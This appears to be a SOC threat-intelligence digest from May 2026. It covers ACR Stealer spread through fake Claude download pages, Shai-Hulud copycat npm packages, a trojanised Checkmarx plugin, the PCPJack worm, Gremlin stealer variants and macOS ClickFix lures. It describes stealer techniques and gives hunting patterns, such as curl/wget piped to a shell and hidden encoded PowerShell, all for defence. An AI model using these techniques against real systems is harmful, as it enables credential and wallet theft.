ACR Stealer distributed via counterfeit Claude AI download pages + malicious search ads

SANS ISC handler Brad Duncan documented a delivery chain that impersonates Anthropic's Claude desktop app via counterfeit "Download for Windows" pages, promoted through malicious search ads hosted on sites.google.com, ultimately dropping ACR Stealer (SANS Internet Storm Center, 2026-05-26). Clicking the download button delivers a corrupted ZIP archive containing obfuscated PowerShell; the infection chain also involves a JPEG image whose precise role the SANS ISC analyst could not characterise (no embedded data was identified in it), and ends in execution of the commodity infostealer ACR Stealer, which harvests credentials and browser data (T1566.002, T1059.001). [SINGLE-SOURCE] — reported by SANS ISC only at time of writing.

Why it matters to us: this is the demand-side mirror of the TrapDoor item above — attackers monetising trust in AI tooling, here against ordinary employees searching for an AI client rather than developers. Add Anthropic/Claude and other AI-brand impersonation to brand-abuse and malvertising monitoring; hunt for powershell.exe spawned from browser-download or archive-extraction paths (Sysmon EID 1 / Windows 4688, especially with -nop/-w hidden/-enc), PowerShell reading image files as code, and outbound connections from powershell.exe to newly-registered domains.

UPDATE (originally covered 2026-05-13, 2026-05-15): Three concurrent developments show the TeamPCP / Shai-Hulud campaign has entered an open-source-imitator phase following Datadog Security Labs' 2026-05-13 analysis of the leaked Shai-Hulud worm source code. First, OX Security disclosed on 2026-05-17 four malicious npm packages published by deadcode09284814 — chalk-tempalte, @deadcode09284814/axios-util, axois-utils, and color-style-utils — combined weekly downloads ~3,000 (OX Security, 2026-05-17; The Hacker News, 2026-05-18). chalk-tempalte is a near-unmodified clone of the leaked Shai-Hulud worm with a modified C2 server and a new attacker-controlled key embedded in the code — the two primary sources disagree on whether this is a public or private key (see § 7); axois-utils bundles "Phantom Bot," a Golang HTTP/TCP/UDP/Reset-flood DDoS tool with Windows Startup folder and Linux scheduled-task persistence that survives package removal; the other two harvest SSH keys, cloud-provider credentials (AWS/GCP/Azure), and cryptocurrency wallet data.

Second, SANS ISC synthesised a 2026-05-18 campaign update confirming that Checkmarx officially acknowledged on 2026-05-11 that its Jenkins AST Scanner plugin had been trojanised — version 2026.5.09, compromise window 2026-05-09 01:25 UTC to 2026-05-10 08:47 UTC — making this TeamPCP's third confirmed Checkmarx intrusion in three months (SANS Internet Storm Center, 2026-05-18; Checkmarx, 2026-05-12). Hundreds of Jenkins controllers installed the malicious plugin before removal; remediated builds 2.0.13-848 and 2.0.13-847 are safe. CxSAST on-premise was unaffected; the cloud-integrated checkmarx/ast-github-action, checkmarx/kics-github-action, and VS Code extensions were all trojaned.

Third, SentinelLabs disclosed on 2026-05-07 — also folded into the SANS ISC summary — "PCPJack," a rival cloud worm that scans for exposed Docker, Kubernetes, Redis, MongoDB and RayML services and chains five CVEs (CVE-2025-29927 Next.js middleware auth bypass; CVE-2025-55182 Next.js Server Actions deserialization; CVE-2026-1357 WPVivid arbitrary file upload; CVE-2025-9501 W3 Total Cache RCE; CVE-2025-48703 CentOS Web Panel command injection) for initial access, then explicitly kills TeamPCP processes and removes TeamPCP artefacts before harvesting credentials — assessed by SentinelLabs with moderate confidence as possibly a former TeamPCP affiliate. Defender takeaway for the Swiss/EU public-sector SOC: developer endpoints and CI/CD runners with installed Checkmarx plugin should be audited for plugin versions outside the known-safe SHA range during the 2026-05-09 → 2026-05-10 window; npm audit and SBOM scans should flag the deadcode09284814 author/scope; egress from CI runners to *.lhr.life hostnames is a high-fidelity hunt pivot for the npm worm wave; Docker/Kubernetes/Redis/MongoDB endpoints exposed to the internet should be inventoried and removed from public exposure (PCPJack's scan list). MITRE T1195.002 (Supply Chain Compromise), T1552.001 (Credentials in Files), T1041 (Exfiltration over C2 Channel).

Palo Alto Networks Unit 42 published on 2026-05-15 an analysis of evolved variants of the Gremlin information stealer, adding three new capability tiers operationally relevant to defenders running endpoint detections tuned for older Gremlin samples (Palo Alto Networks Unit 42, 2026-05-15). Obfuscation has shifted to embedding encrypted payloads in .NET resource sections (XOR-keyed) combined with single- or double-character identifier renaming and a runtime string-decoder function (_003CModule_003E.c()) — defeating static signature analysis of string literals that previous-generation Gremlin samples used. A new crypto-clipper component continuously monitors the system clipboard and replaces Bitcoin and Ethereum wallet addresses with attacker-controlled equivalents in real time, T1115. The most operationally interesting addition is a WebSocket-based session-hijack module that reads active browser process memory (Chrome-based browsers) to extract session tokens directly from running processes, bypassing the cookie-encryption mitigations modern browsers apply at disk — T1185 Browser Session Hijacking. Credential scope includes browser cookies, session tokens, saved passwords, payment-card details, FTP and VPN credentials, Discord tokens (dedicated regex scanner), clipboard content, and cryptocurrency wallet files. Exfiltration is HTTPS POST to a private web panel; a Telegram Bot API channel is the secondary channel. Detection: Sysmon EID 10 (process access) targeting chrome.exe or msedge.exe (and other Chrome-based browser processes) from unexpected parent processes; clipboard-monitoring hook registration from non-standard processes (generic Windows clipboard-listener API surface). Hardening: browser isolation for high-value sessions; clipboard-API access audited in EDR telemetry. Single-source — Unit 42 only; flagged for verification.

Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users via fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes — Shub Stealer earlier wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell payload directly to bash, bypassing Gatekeeper because no signed application bundle is ever launched. Three distinct infostealers — Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer) — are delivered across campaign variants per Microsoft, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists with Telegram-fallback C2.

ATT&CK mapping: T1204.002 User Execution: Malicious File, T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert on Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile; LaunchAgent file-creation events from outside /Applications or /Library/Application Support/<vendor> paths; anomalous Keychain API calls from processes without UI entitlements (Endpoint Security framework ES_EVENT_TYPE_NOTIFY_OPENSSH-style hooks expose this on EDR-instrumented Macs).